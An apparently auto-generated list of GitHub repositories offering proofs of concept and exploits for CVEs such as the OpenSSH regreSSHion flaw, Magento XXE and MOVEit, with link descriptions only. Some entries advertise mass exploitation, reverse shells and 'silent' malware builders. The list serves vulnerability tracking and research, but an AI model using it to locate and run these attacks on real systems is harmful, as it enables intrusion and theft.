**mirror of the original 7etsuo/cve-2024-6387-poc** : [lflare/cve-2024-6387-poc](https://github.com/lflare/cve-2024-6387-poc) create time: 2024-07-01T12:26:40Z

**no description** : [acrono/cve-2024-6387-poc](https://github.com/acrono/cve-2024-6387-poc) create time: 2024-07-01T12:16:21Z

**no description** : [Stuub/CVE-2024-28995](https://github.com/Stuub/CVE-2024-28995) create time: 2024-07-01T11:49:51Z

**Reflected XSS in 2ClickPortal** : [kac89/CVE-2024-5961](https://github.com/kac89/CVE-2024-5961) create time: 2024-07-01T11:17:48Z

**a signal handler race condition in OpenSSH's server (sshd)** : [zgzhang/cve-2024-6387-poc](https://github.com/zgzhang/cve-2024-6387-poc) create time: 2024-07-01T10:55:29Z

**a signal handler race condition in OpenSSH's server (sshd)** : [7etsuo/cve-2024-6387-poc](https://github.com/7etsuo/cve-2024-6387-poc) create time: 2024-07-01T10:42:02Z

**no description** : [Atreb92/cve-2024-37765](https://github.com/Atreb92/cve-2024-37765) create time: 2024-07-01T10:39:40Z

**no description** : [Atreb92/cve-2024-37764](https://github.com/Atreb92/cve-2024-37764) create time: 2024-07-01T10:37:21Z

**no description** : [Atreb92/cve-2024-37763](https://github.com/Atreb92/cve-2024-37763) create time: 2024-07-01T10:35:51Z

**no description** : [Atreb92/cve-2024-37762](https://github.com/Atreb92/cve-2024-37762) create time: 2024-07-01T10:28:56Z

**Exploit script showcasing a mixture of CVE-2019-18818 and CVE-2019-19609 for unauthenticated remote code execution in Strapi CMS.** : [Hackhoven/Strapi-RCE](https://github.com/Hackhoven/Strapi-RCE) create time: 2024-07-01T10:23:19Z

**no description** : [invaderslabs/CVE-2024-20666](https://github.com/invaderslabs/CVE-2024-20666) create time: 2024-07-01T10:14:40Z

**polkit** : [evkl1d/CVE-2021-4034](https://github.com/evkl1d/CVE-2021-4034) create time: 2024-07-01T08:04:29Z

**CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)** : [jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento](https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento) create time: 2024-07-01T08:19:28Z

**no description** : [cmsec423/Magento-XXE-CVE-2024-34102](https://github.com/cmsec423/Magento-XXE-CVE-2024-34102) create time: 2024-07-01T05:08:37Z

**Magento XXE** : [cmsec423/CVE-2024-34102](https://github.com/cmsec423/CVE-2024-34102) create time: 2024-07-01T05:06:42Z

**no description** : [ProDefense/CVE-2018-17456](https://github.com/ProDefense/CVE-2018-17456) create time: 2024-06-30T20:31:59Z

**This is a proof of concept for the Zyxel vulnerabilities I found. Read the blog :)** : [Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc](https://github.com/Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc) create time: 2024-06-30T17:54:02Z

**Magento XXE (CVE-2024-34102)** : [0x0d3ad/CVE-2024-34102](https://github.com/0x0d3ad/CVE-2024-34102) create time: 2024-06-30T16:49:26Z

**This exploit offers an in-depth look at the CVE-2021-41091 security vulnerability and provides a step-by-step guide on how to utilize the exploit script to achieve privilege escalation on a host.** : [SNE-M23-SN/Vulnerable-Docker-Engine](https://github.com/SNE-M23-SN/Vulnerable-Docker-Engine) create time: 2024-06-30T10:57:02Z

**This is a mailer that use console prompt to exploit this vulnerability** : [DerZiad/CVE-2024-21413](https://github.com/DerZiad/CVE-2024-21413) create time: 2024-06-30T08:53:46Z

**CVE-2023-45866** : [cisnarfu/Bluepop](https://github.com/cisnarfu/Bluepop) create time: 2024-06-29T19:06:37Z

**phpMyAdmin 2.6.4-pl1 - Directory Traversal** : [Cr0w-ui/-CVE-2005-3299-](https://github.com/Cr0w-ui/-CVE-2005-3299-) create time: 2024-06-29T14:17:16Z

**D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.** : [FaLLenSKiLL1/CVE-2024-22853](https://github.com/FaLLenSKiLL1/CVE-2024-22853) create time: 2024-06-29T10:21:11Z

**no description** : [PavilionQ/CVE-2023-33246-mitigation](https://github.com/PavilionQ/CVE-2023-33246-mitigation) create time: 2024-06-29T06:31:17Z

**TEST CVE-2024-34102 Magento XXE** : [cmsec423/CVE-2024-34102](https://github.com/cmsec423/CVE-2024-34102) create time: 2024-06-29T06:00:46Z

**cve magento 2024** : [ibher16/rce_mgento](https://github.com/ibher16/rce_mgento) create time: 2024-06-29T05:40:52Z

**CosmicSting (CVE-2024-34102)** : [Chocapikk/CVE-2024-34102](https://github.com/Chocapikk/CVE-2024-34102) create time: 2024-06-28T23:33:21Z

**no description** : [glen-pearson/ProxyLogon-CVE-2021-26855](https://github.com/glen-pearson/ProxyLogon-CVE-2021-26855) create time: 2023-04-23T22:26:45Z

**no description** : [s1204IT/CVE-2022-46395](https://github.com/s1204IT/CVE-2022-46395) create time: 2024-06-28T16:37:46Z

**Modified RCE with a remote shell and logging** : [glen-pearson/CVE-2023-34362-RCE](https://github.com/glen-pearson/CVE-2023-34362-RCE) create time: 2024-06-28T17:13:15Z

**Exploit created by wacthtower, modified with a reverse shell and logging.** : [glen-pearson/MoveIT_CVE-2024-5806](https://github.com/glen-pearson/MoveIT_CVE-2024-5806) create time: 2024-06-28T17:04:12Z

**no description** : [s1204IT/CVE-2022-20186](https://github.com/s1204IT/CVE-2022-20186) create time: 2024-06-28T15:53:30Z

**Mass Exploit - CVE-2024-21650 - XWiki < Remote code execution (RCE)** : [codeb0ss/CVE-2024-21650-PoC](https://github.com/codeb0ss/CVE-2024-21650-PoC) create time: 2024-06-28T16:00:42Z

**A PoC demonstration , critical XML entity injection vulnerability in Magento** : [d0rb/CVE-2024-34102](https://github.com/d0rb/CVE-2024-34102) create time: 2024-06-28T14:50:29Z

**no description** : [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577) create time: 2024-06-28T14:11:15Z

**no description** : [11whoami99/CVE-2024-34102](https://github.com/11whoami99/CVE-2024-34102) create time: 2024-06-28T12:45:40Z

**no description** : [olebris/CVE-2024-4040](https://github.com/olebris/CVE-2024-4040) create time: 2024-06-28T10:32:51Z

**AdmirorFrames Joomla! Extension < 5.0 - HTML Injection** : [afine-com/CVE-2024-5737](https://github.com/afine-com/CVE-2024-5737) create time: 2024-06-28T10:27:35Z

**CVE-2024-21413 PoC** : [olebris/CVE-2024-21413](https://github.com/olebris/CVE-2024-21413) create time: 2024-06-28T10:27:34Z

**AdmirorFrames Joomla! Extension < 5.0 - Server-Side Request Forgery** : [afine-com/CVE-2024-5736](https://github.com/afine-com/CVE-2024-5736) create time: 2024-06-28T10:27:08Z

**AdmirorFrames Joomla! Extension < 5.0 - Full Path Disclosure** : [afine-com/CVE-2024-5735](https://github.com/afine-com/CVE-2024-5735) create time: 2024-06-28T10:15:17Z

**no description** : [Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-](https://github.com/Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-) create time: 2024-06-28T10:00:00Z

**Exploit_CVE_2023_7028** : [olebris/Exploit_CVE_2023_7028-](https://github.com/olebris/Exploit_CVE_2023_7028-) create time: 2024-06-28T09:54:59Z

**CVE-2024-4577** : [olebris/CVE-2024-4577](https://github.com/olebris/CVE-2024-4577) create time: 2024-06-28T10:19:59Z

**no description** : [scirusvulgaris/CVE-2017-12617](https://github.com/scirusvulgaris/CVE-2017-12617) create time: 2024-06-28T08:33:41Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [dr3u1d/CVE-2024-34102-RCE](https://github.com/dr3u1d/CVE-2024-34102-RCE) create time: 2024-06-28T00:02:55Z

**POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.** : [bigb0x/CVE-2024-34102](https://github.com/bigb0x/CVE-2024-34102) create time: 2024-06-27T21:57:24Z

**no description** : [CyberSecuritist/CVE-2024-21754-Forti-RCE](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE) create time: 2024-06-27T18:52:06Z

**no description** : [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102) create time: 2024-06-27T18:10:13Z

**no description** : [ArturArz1/TestCVE-2024-34102](https://github.com/ArturArz1/TestCVE-2024-34102) create time: 2024-06-27T16:59:29Z

**Bootloader unlock using CVE-2022-38694 for Anbernic Unisoc T820 devices** : [TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820](https://github.com/TheGammaSqueeze/Bootloader_Unlock_Anbernic_T820) create time: 2024-06-27T14:28:13Z

**A Pwn2Own SpiderMonkey JIT Bug: From Integer Range Inconsistency to Bound Check Elimination then RCE** : [bjrjk/CVE-2024-29943](https://github.com/bjrjk/CVE-2024-29943) create time: 2024-06-27T13:47:52Z

**This is a simple proof of concept for CVE-2023-49103.** : [d0rb/CVE-2023-49103](https://github.com/d0rb/CVE-2023-49103) create time: 2024-06-27T13:46:46Z

**no description** : [Sudistark/rewrites-nextjsCVE202434350](https://github.com/Sudistark/rewrites-nextjsCVE202434350) create time: 2024-06-27T14:01:36Z

**no description** : [Sudistark/rewrites-nextjs-CVE202434350](https://github.com/Sudistark/rewrites-nextjs-CVE202434350) create time: 2024-06-27T14:01:28Z

**no description** : [Sudistark/rewrites-nextjs-CVE-202434350](https://github.com/Sudistark/rewrites-nextjs-CVE-202434350) create time: 2024-06-27T14:01:18Z

**no description** : [Sudistark/rewrites-nextjs-CVE-2024-34350](https://github.com/Sudistark/rewrites-nextjs-CVE-2024-34350) create time: 2024-06-27T14:00:34Z

**no description** : [iamz24/CVE-2021-3493_CVE--2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE--2022-3357) create time: 2024-06-27T10:25:04Z

**It is a simple script to automate internal port scanning dueto SSRF in requests-baskets v 1.2.1. this script can also assisst in solving 'SAU' machine from hackthebox** : [Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning](https://github.com/Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning) create time: 2024-06-27T09:48:14Z

**🆘New Windows Kernel Priviledge Escalation Vulnerability** : [NextGenPentesters/CVE-2024-30088-](https://github.com/NextGenPentesters/CVE-2024-30088-) create time: 2024-06-27T07:05:46Z

**POC para CVE-2011-2523** : [Fatalitysec/vsftpd_2.3.4_Backdoor](https://github.com/Fatalitysec/vsftpd_2.3.4_Backdoor) create time: 2024-06-27T03:09:11Z

**no description** : [0range1337/CVE-CVE-2023-4622](https://github.com/0range1337/CVE-CVE-2023-4622) create time: 2024-06-26T23:42:38Z

**Publication for Cross Site Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php** : [jasonthename/CVE-2024-39248](https://github.com/jasonthename/CVE-2024-39248) create time: 2024-06-26T21:06:56Z

**Evangelos Mourikis POC for CVE-2015-6668 converted for Python 3** : [jimdiroffii/CVE-2015-6668](https://github.com/jimdiroffii/CVE-2015-6668) create time: 2024-06-26T19:43:50Z

**no description** : [zunak/CVE-2024-39249](https://github.com/zunak/CVE-2024-39249) create time: 2024-06-26T17:30:02Z

**CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (2.4.50)** : [rafifdna/CVE-2021-42013](https://github.com/rafifdna/CVE-2021-42013) create time: 2024-06-26T13:57:52Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [ex-arny/CVE-2024-34102-RCE](https://github.com/ex-arny/CVE-2024-34102-RCE) create time: 2024-06-26T12:18:24Z

**no description** : [Praison001/CVE-2024-28995-SolarWinds-Serv-U](https://github.com/Praison001/CVE-2024-28995-SolarWinds-Serv-U) create time: 2024-06-26T10:51:50Z

**Path traversal in Ollama with rogue registry server** : [Bi0x/CVE-2024-37032](https://github.com/Bi0x/CVE-2024-37032) create time: 2024-06-26T03:11:29Z

**no description** : [ggfzx/CVE-2024-4577](https://github.com/ggfzx/CVE-2024-4577) create time: 2024-06-26T07:07:49Z

**PoC of CVE-2024-33883, RCE vulnerability of ejs.** : [Grantzile/PoC-CVE-2024-33883](https://github.com/Grantzile/PoC-CVE-2024-33883) create time: 2024-06-25T18:40:31Z

**D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.** : [FaLLenSKiLL1/CVE-2024-33111](https://github.com/FaLLenSKiLL1/CVE-2024-33111) create time: 2024-06-25T14:54:01Z

**CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Unauthenticated SQL Injection via 'ays_questions' Parameter** : [truonghuuphuc/CVE-2024-6028-Poc](https://github.com/truonghuuphuc/CVE-2024-6028-Poc) create time: 2024-06-25T13:55:27Z

**Exploit for the CVE-2024-5806** : [watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806](https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806) create time: 2024-06-24T16:28:35Z

**no description** : [tekua/CVE-2024-33113](https://github.com/tekua/CVE-2024-33113) create time: 2024-06-25T14:16:03Z

**The script has been remastered by Teymur Novruzov to ensure compatibility with Python 3. This tool is intended for educational purposes only. Unauthorized use of this tool on any system or network without permission is illegal. The author is not responsible for any misuse of this tool.** : [TeymurNovruzov/CVE-2019-9053-python3-remastered](https://github.com/TeymurNovruzov/CVE-2019-9053-python3-remastered) create time: 2024-06-25T10:47:24Z

**Proof of concept of CVE-2024-29868 affecting Apache StreamPipes from 0.69.0 through 0.93.0** : [DEVisions/CVE-2024-29868](https://github.com/DEVisions/CVE-2024-29868) create time: 2024-06-24T14:53:05Z

**no description** : [bahe-msft/govuln-CVE-2023-47108](https://github.com/bahe-msft/govuln-CVE-2023-47108) create time: 2024-06-25T05:05:26Z

**no description** : [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784) create time: 2024-06-25T02:30:31Z

**CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module** : [absholi7ly/PHP-Injection-in-M4-PDF-Extensions](https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions) create time: 2024-06-24T23:26:05Z

**CVE-2023-30253 PoC** : [g4nkd/CVE-2023-25690-PoC](https://github.com/g4nkd/CVE-2023-25690-PoC) create time: 2024-06-24T22:20:57Z

**D-LINK DIR-845L is vulnerable to information disclosure via the bsc_sms_inbox.php file.** : [FaLLenSKiLL1/CVE-2024-33113](https://github.com/FaLLenSKiLL1/CVE-2024-33113) create time: 2024-06-24T19:50:13Z

**CVE-2019-9849: Remote bullet graphics retrieved in “stealth mode” in LibreOffice** : [mbadanoiu/CVE-2019-9849](https://github.com/mbadanoiu/CVE-2019-9849) create time: 2024-06-24T16:49:40Z

**CVE-2018-9995** : [A-Alabdoo/CVE-DVr](https://github.com/A-Alabdoo/CVE-DVr) create time: 2024-06-24T16:17:18Z

**In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via php code injection bypassing the application restrictions.** : [dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253](https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253) create time: 2024-06-24T16:22:31Z

**no description** : [huseyinstif/CVE-2024-32030-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template) create time: 2024-06-24T11:57:26Z

**no description** : [PhinehasNarh/CVE-2024-4577-Defend](https://github.com/PhinehasNarh/CVE-2024-4577-Defend) create time: 2024-06-24T10:48:24Z

**no description** : [tykawaii98/CVE-2024-30088](https://github.com/tykawaii98/CVE-2024-30088) create time: 2024-06-24T10:37:26Z

**(DOM-based XSS) HTML Injection vulnerability in TOWeb v.12.05 and before allows an attacker to inject HTML/JS code via the _message.html component.** : [leoCottret/CVE-2024-30956](https://github.com/leoCottret/CVE-2024-30956) create time: 2024-04-03T07:38:11Z

**Test CVE 2024 32002 vulnerability on the Ubuntu machine** : [sreevatsa1997/test_cve_32002](https://github.com/sreevatsa1997/test_cve_32002) create time: 2024-06-24T09:16:23Z

**poc for CVE-2023-23388 (LPE in Windows 10/11 bthserv service)** : [ynwarcs/CVE-2023-23388](https://github.com/ynwarcs/CVE-2023-23388) create time: 2024-06-23T19:52:09Z

**pocs & exploit for CVE-2023-24871 (rce + lpe)** : [ynwarcs/CVE-2023-24871](https://github.com/ynwarcs/CVE-2023-24871) create time: 2024-06-21T15:01:15Z

**☣️ This repository contains the description and a proof of concept for CVE-2024-34313** : [vincentscode/CVE-2024-34313](https://github.com/vincentscode/CVE-2024-34313) create time: 2024-06-23T09:02:07Z

**☣️ This repository contains the description and a proof of concept for CVE-2024-34312** : [vincentscode/CVE-2024-34312](https://github.com/vincentscode/CVE-2024-34312) create time: 2024-06-23T08:37:44Z

**poc for CVE-2024-32002** : [Yitian26/git_rce](https://github.com/Yitian26/git_rce) create time: 2024-06-23T06:10:06Z

**no description** : [tykawaii98/CVE-2024-21338_PoC](https://github.com/tykawaii98/CVE-2024-21338_PoC) create time: 2024-06-23T06:03:44Z

**no description** : [th3gokul/CVE-2024-34470](https://github.com/th3gokul/CVE-2024-34470) create time: 2024-06-23T02:23:57Z

**SQL Injection POC for CVE-2024-21514: Divido payment extension for OpenCart** : [bigb0x/CVE-2024-21514](https://github.com/bigb0x/CVE-2024-21514) create time: 2024-06-23T00:55:00Z

**POC for CVE-2024-31982: XWiki Platform Remote Code Execution > 14.10.20** : [bigb0x/CVE-2024-31982](https://github.com/bigb0x/CVE-2024-31982) create time: 2024-06-22T21:20:33Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Megalitons/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Megalitons/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-06-22T18:54:10Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Megalitons/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Megalitons/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-06-22T18:54:10Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Megalitons/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Megalitons/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-06-22T18:54:10Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Megalitons/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Megalitons/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-06-22T18:54:09Z

**no description** : [binaryusergearone/SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-](https://github.com/binaryusergearone/SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-) create time: 2024-06-22T17:54:50Z

**no description** : [th3gokul/CVE-2024-31982](https://github.com/th3gokul/CVE-2024-31982) create time: 2024-06-22T17:04:02Z

**CVE-2023-23397: Remote Code Execution Vulnerability in Microsoft Outlook** : [Symbolexe/CVE-2023-23397](https://github.com/Symbolexe/CVE-2023-23397) create time: 2024-06-22T14:25:39Z

**Exploit for CVE-2024-28999 SolarWinds Platform Race Condition Vulnerability - login page** : [HussainFathy/CVE-2024-28999](https://github.com/HussainFathy/CVE-2024-28999) create time: 2024-06-22T13:39:56Z

**no description** : [k3lpi3b4nsh33/CVE-2024-31982](https://github.com/k3lpi3b4nsh33/CVE-2024-31982) create time: 2024-06-22T08:47:20Z

**This is a automation of cve-2021-31630 exploitation** : [adibabdala123/cve-2021-31630](https://github.com/adibabdala123/cve-2021-31630) create time: 2024-06-21T22:10:49Z

**This repository contain an script to exploit CVE-2017-7269** : [OmarSuarezDoro/CVE-2017-7269](https://github.com/OmarSuarezDoro/CVE-2017-7269) create time: 2024-06-21T15:05:15Z

**Exploiter a Vulnerability detection and Exploitation tool for CVE-2024-29973 with Asychronous Performance.** : [RevoltSecurities/CVE-2024-29973](https://github.com/RevoltSecurities/CVE-2024-29973) create time: 2024-06-21T15:20:52Z

**This script is a modified version of the original exploit by Daniele Scanu which exploits an unauthenticated SQL injection vulnerability in CMS Made Simple <= 2.2.10 (CVE-2019-9053).** : [Dh4nuJ4/SimpleCTF-UpdatedExploit](https://github.com/Dh4nuJ4/SimpleCTF-UpdatedExploit) create time: 2024-06-20T17:23:22Z

**no description** : [phanthibichtram12/CVE-2022-1565](https://github.com/phanthibichtram12/CVE-2022-1565) create time: 2024-06-21T11:08:26Z

**no description** : [phanthibichtram12/CVE-2022-1329](https://github.com/phanthibichtram12/CVE-2022-1329) create time: 2024-06-21T10:05:03Z

**CVE-2024-4367复现** : [Scivous/CVE-2024-4367-npm](https://github.com/Scivous/CVE-2024-4367-npm) create time: 2024-06-21T08:16:42Z

**PoC and Bulk Scanner for CVE-2024-29973** : [p0et08/CVE-2024-29973](https://github.com/p0et08/CVE-2024-29973) create time: 2024-06-21T06:38:50Z

**The script exploits Mailcow vulnerabilities via XSS and RCE, emphasizing the need for robust security measures and responsible usage to enhance web application security.** : [Alchemist3dot14/CVE-2024-30270-PoC](https://github.com/Alchemist3dot14/CVE-2024-30270-PoC) create time: 2024-06-21T04:47:48Z

**no description** : [CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape) create time: 2024-06-21T04:43:21Z

**PoC of CVE-2024-37759** : [crumbledwall/CVE-2024-37759_PoC](https://github.com/crumbledwall/CVE-2024-37759_PoC) create time: 2024-06-21T02:58:40Z

**CVE-2023-30253 PoC** : [g4nkd/CVE-2023-30253-PoC](https://github.com/g4nkd/CVE-2023-30253-PoC) create time: 2024-06-21T01:41:34Z

**This repository contains a proof-of-concept (PoC) for exploiting CVE-2024-37742, a vulnerability in Safe Exam Browser (SEB) ≤ 3.5.0 on Windows. The vulnerability enables unauthorized clipboard data sharing between SEB's kiosk mode and the underlying system, compromising the integrity of exams.** : [Eteblue/CVE-2024-37742](https://github.com/Eteblue/CVE-2024-37742) create time: 2024-06-20T21:01:28Z

**CVE-2023-2825 exploit script** : [cc3305/CVE-2023-2825](https://github.com/cc3305/CVE-2023-2825) create time: 2024-06-20T20:22:01Z

**XNU kernel buffer overflow. Introduced in xnu-10002.1.13, fixed in xnu-10063.121.3** : [jprx/CVE-2024-27815](https://github.com/jprx/CVE-2024-27815) create time: 2024-06-19T22:03:02Z

**no description** : [Mr-r00t11/CVE-2024-34470](https://github.com/Mr-r00t11/CVE-2024-34470) create time: 2024-06-20T16:47:28Z

**CVE-2024-29275.yaml** : [Cyphercoda/nuclei_template](https://github.com/Cyphercoda/nuclei_template) create time: 2024-06-20T16:19:30Z

**no description** : [CamillaFranceschini/CVE-2023-4357](https://github.com/CamillaFranceschini/CVE-2023-4357) create time: 2024-06-20T13:20:43Z

**Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.** : [junnythemarksman/CVE-2024-24590](https://github.com/junnythemarksman/CVE-2024-24590) create time: 2024-06-20T11:23:56Z

**no description** : [AkashicYiTai/CVE-2019-6250-libzmq](https://github.com/AkashicYiTai/CVE-2019-6250-libzmq) create time: 2024-06-20T10:56:43Z

**no description** : [WanLiChangChengWanLiChang/CVE-2024-29972](https://github.com/WanLiChangChengWanLiChang/CVE-2024-29972) create time: 2024-06-20T11:12:52Z

**This is a Python 3 version of this exploit. Hope it works!!!** : [josemlwdf/CVE-2019-13272](https://github.com/josemlwdf/CVE-2019-13272) create time: 2024-06-20T10:04:13Z

**POC for CVE-2024-36527: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal** : [bigb0x/CVE-2024-36527](https://github.com/bigb0x/CVE-2024-36527) create time: 2024-06-20T09:42:07Z

**submodule for CVE-2024-320002** : [bonnettheo/hook](https://github.com/bonnettheo/hook) create time: 2024-06-20T09:02:23Z

**Adaptation of the adipinto exploit, to python3** : [marcocarolasec/CVE-2016-2004-Exploit](https://github.com/marcocarolasec/CVE-2016-2004-Exploit) create time: 2024-06-20T08:12:43Z

**exploit for CVE-2024-32002** : [bonnettheo/CVE-2024-32002](https://github.com/bonnettheo/CVE-2024-32002) create time: 2024-06-20T07:37:09Z

**basic concept for the latest windows wifi driver CVE** : [blkph0x/CVE_2024_30078_POC_WIFI](https://github.com/blkph0x/CVE_2024_30078_POC_WIFI) create time: 2024-06-20T05:58:45Z

**HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion** : [Cappricio-Securities/CVE-2024-34470](https://github.com/Cappricio-Securities/CVE-2024-34470) create time: 2024-06-20T04:01:42Z

**no description** : [rdoix/cve-2024-21762-checker](https://github.com/rdoix/cve-2024-21762-checker) create time: 2024-06-20T02:58:02Z

**no description** : [k3lpi3b4nsh33/CVE-2024-29973](https://github.com/k3lpi3b4nsh33/CVE-2024-29973) create time: 2024-06-20T01:52:35Z

**no description** : [MalekAlthubiany/CVE-2021-43798](https://github.com/MalekAlthubiany/CVE-2021-43798) create time: 2024-06-19T23:27:01Z

**PoC for CVE-2024-37079 Vcenter server unauthenticated RCE.** : [v3rce/CVE-2024-37079-RCE-POC](https://github.com/v3rce/CVE-2024-37079-RCE-POC) create time: 2024-06-20T01:09:20Z

**no description** : [sbroker-dev/cve-2024-30078](https://github.com/sbroker-dev/cve-2024-30078) create time: 2024-06-20T00:02:26Z

**PoC - Prueba de Concepto de CVE-2024-4367 en conjunto al CVE-2023-38831 en un solo Script** : [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo) create time: 2024-06-19T23:23:07Z

**no description** : [davidxbors/CVE-2023-47504-POC](https://github.com/davidxbors/CVE-2023-47504-POC) create time: 2024-06-19T18:07:56Z

**Cross-Site Scripting (XSS) Vulnerability in CMSimple_XH** : [surajhacx/CVE-2024-34452](https://github.com/surajhacx/CVE-2024-34452) create time: 2024-06-19T17:38:49Z

**CVE-2022-22947 exploit script** : [cc3305/CVE-2022-22947](https://github.com/cc3305/CVE-2022-22947) create time: 2024-06-19T15:31:19Z

**no description** : [uthrasri/CVE-2019-16746](https://github.com/uthrasri/CVE-2019-16746) create time: 2024-06-19T11:17:31Z

**POC and bulk scanner for CVE-2024-34470** : [bigb0x/CVE-2024-34470](https://github.com/bigb0x/CVE-2024-34470) create time: 2024-06-19T11:32:40Z

**no description** : [uthrasri/CVE-2019-17666](https://github.com/uthrasri/CVE-2019-17666) create time: 2024-06-19T11:02:57Z

**POC for CVE-2024-29973** : [bigb0x/CVE-2024-29973](https://github.com/bigb0x/CVE-2024-29973) create time: 2024-06-19T10:34:56Z

**CVE-2020-2969** : [emad-almousa/CVE-2020-2969](https://github.com/emad-almousa/CVE-2020-2969) create time: 2024-06-19T09:40:56Z

**no description** : [Huoper/CVE-2024-5899](https://github.com/Huoper/CVE-2024-5899) create time: 2024-06-19T09:40:29Z

**no description** : [momika233/CVE-2024-29973](https://github.com/momika233/CVE-2024-29973) create time: 2024-06-19T09:28:46Z

**我的CVE-2024-37791** : [czheisenberg/CVE-2024-37791](https://github.com/czheisenberg/CVE-2024-37791) create time: 2024-06-19T09:16:30Z

**no description** : [bme2003/CVE-2018-6574](https://github.com/bme2003/CVE-2018-6574) create time: 2024-06-18T22:33:17Z

**no description** : [amandineVdw/CVE-2024-4577](https://github.com/amandineVdw/CVE-2024-4577) create time: 2024-06-19T01:50:40Z

**js2py sandbox escape, bypass pyimport restriction.** : [Marven11/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) create time: 2024-06-19T01:46:33Z

**Only for windows 11. Check if you are protected via windows update against CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability** : [nkontopoul/checkwifivulnerability](https://github.com/nkontopoul/checkwifivulnerability) create time: 2024-06-18T20:05:06Z

**no description** : [uthrasri/frameworks_opt_net_CVE-2021-0466](https://github.com/uthrasri/frameworks_opt_net_CVE-2021-0466) create time: 2024-06-18T10:34:34Z

**XSS PoC/Exploit for Open Link Plugin for CKEditor 4** : [7Ragnarok7/CVE-2024-37888](https://github.com/7Ragnarok7/CVE-2024-37888) create time: 2024-06-10T07:00:18Z

**A small tool to create a PoC for CVE-2000-0649.** : [Downgraderz/PoC-CVE-2000-0649](https://github.com/Downgraderz/PoC-CVE-2000-0649) create time: 2024-06-18T13:31:44Z

**no description** : [uthrasri/frameworks_opt_net_CVE-2021-0390](https://github.com/uthrasri/frameworks_opt_net_CVE-2021-0390) create time: 2024-06-18T13:59:29Z

**no description** : [jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE](https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE) create time: 2024-06-18T13:19:21Z

**no description** : [pl4int3xt/cve_2024_0044](https://github.com/pl4int3xt/cve_2024_0044) create time: 2024-06-18T12:30:53Z

